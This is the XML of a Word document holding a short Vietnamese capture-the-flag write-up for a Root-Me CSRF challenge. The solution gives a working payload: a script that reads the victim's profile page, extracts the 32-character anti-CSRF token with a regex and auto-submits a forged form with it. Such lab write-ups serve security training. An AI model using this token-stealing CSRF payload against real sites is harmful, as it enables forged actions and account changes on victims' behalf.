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85A0" w14:textId="44C5C001" w:rsidR="00F30326" w:rsidRDefault="00F30326" w:rsidP="008A7C17">
      <w:r>
        <w:t>Đầu tiền vào trang đăng ký và đăng nhập, kiểm tra thông tin thì form không có filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18225B79" w14:textId="24D65B2E" w:rsidR="00F30326" w:rsidRDefault="00F30326" w:rsidP="008A7C17">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E74C9CE" wp14:editId="111CA93C">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="877480379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80379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7EFF" w14:textId="689712AE" w:rsidR="00F30326" w:rsidRDefault="00F30326" w:rsidP="008A7C17">
      <w:r>
        <w:t>Thực hiện tạo payload và truyền vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B5100" w14:textId="6FB9CE7D" w:rsidR="008A7C17" w:rsidRDefault="008A7C17" w:rsidP="008A7C17">
      <w:r>
        <w:t>&lt;form action="http://challenge01.root-me.org/web-client/ch23/?action=profile" method="post" name="csrf_form" enctype="multipart/form-data"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F58F8" w14:textId="399359C1" w:rsidR="008A7C17" w:rsidRDefault="008A7C17" w:rsidP="008A7C17">
      <w:r>
        <w:t xml:space="preserve">                &lt;input id="username" type="text" name="username" value="</w:t>
      </w:r>
      <w:r>
        <w:t>kiet</w:t>
      </w:r>
      <w:r>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B85188E" w14:textId="77777777" w:rsidR="008A7C17" w:rsidRDefault="008A7C17" w:rsidP="008A7C17">
      <w:r>
        <w:t xml:space="preserve">                &lt;input id="status" type="checkbox" name="status" checked &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0BE018" w14:textId="77777777" w:rsidR="008A7C17" w:rsidRDefault="008A7C17" w:rsidP="008A7C17">
      <w:r>
        <w:t xml:space="preserve">                &lt;input id="token" type="hidden" name="token" value="" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA0D0C2" w14:textId="77777777" w:rsidR="008A7C17" w:rsidRDefault="008A7C17" w:rsidP="008A7C17">
      <w:r>
        <w:t xml:space="preserve">                &lt;button type="submit"&gt;Submit&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA484EE" w14:textId="6C347070" w:rsidR="008A7C17" w:rsidRDefault="008A7C17" w:rsidP="008A7C17">
      <w:r>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7533413D" w14:textId="1143AC44" w:rsidR="008A7C17" w:rsidRDefault="008A7C17" w:rsidP="008A7C17">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5AABEF" w14:textId="77777777" w:rsidR="008A7C17" w:rsidRDefault="008A7C17" w:rsidP="008A7C17">
      <w:r>
        <w:t xml:space="preserve">                xhttp = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1382C386" w14:textId="77777777" w:rsidR="008A7C17" w:rsidRDefault="008A7C17" w:rsidP="008A7C17">
      <w:r>
        <w:t xml:space="preserve">                xhttp.open("GET", "http://challenge01.root-me.org/web-client/ch23/?action=profile", false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A939B09" w14:textId="77777777" w:rsidR="008A7C17" w:rsidRDefault="008A7C17" w:rsidP="008A7C17">
      <w:r>
        <w:t xml:space="preserve">                xhttp.send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F95C3C" w14:textId="77777777" w:rsidR="008A7C17" w:rsidRDefault="008A7C17" w:rsidP="008A7C17">
      <w:r>
        <w:t xml:space="preserve">                token_admin = (xhttp.responseText.match(/[abcdef0123456789]{32}/));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E0CAA8" w14:textId="77777777" w:rsidR="008A7C17" w:rsidRDefault="008A7C17" w:rsidP="008A7C17">
      <w:r>
        <w:t xml:space="preserve">                 document.getElementById('token').setAttribute('value', token_admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3731DD0F" w14:textId="77777777" w:rsidR="008A7C17" w:rsidRDefault="008A7C17" w:rsidP="008A7C17">
      <w:r>
        <w:t xml:space="preserve">                document.csrf_form.submit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A438F9D" w14:textId="0EFA6AE9" w:rsidR="00633FE4" w:rsidRDefault="008A7C17" w:rsidP="008A7C17">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB7CF72" w14:textId="1B47915F" w:rsidR="00F30326" w:rsidRDefault="00F30326" w:rsidP="008A7C17">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Thực hiện truyền vào xong thì ta có flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C001AF1" w14:textId="64CA44A1" w:rsidR="00F30326" w:rsidRDefault="00F30326" w:rsidP="008A7C17">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A18429E" wp14:editId="0F23D56B">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="789353007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53007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36BF" w14:textId="77777777" w:rsidR="00F30326" w:rsidRDefault="00F30326" w:rsidP="008A7C17"/>
    <w:p w14:paraId="2F8E4F91" w14:textId="77777777" w:rsidR="00F30326" w:rsidRDefault="00F30326" w:rsidP="008A7C17"/>
    <w:sectPr w:rsidR="00F30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4B"/>
    <w:rsid w:val="0061014F"/>
    <w:rsid w:val="00633FE4"/>
    <w:rsid w:val="008A7C17"/>
    <w:rsid w:val="00E93F4B"/>
    <w:rsid w:val="00F3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38F8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A0ED93CB-1D45-4A32-B874-6562CE96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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-10T15:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-10T15:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>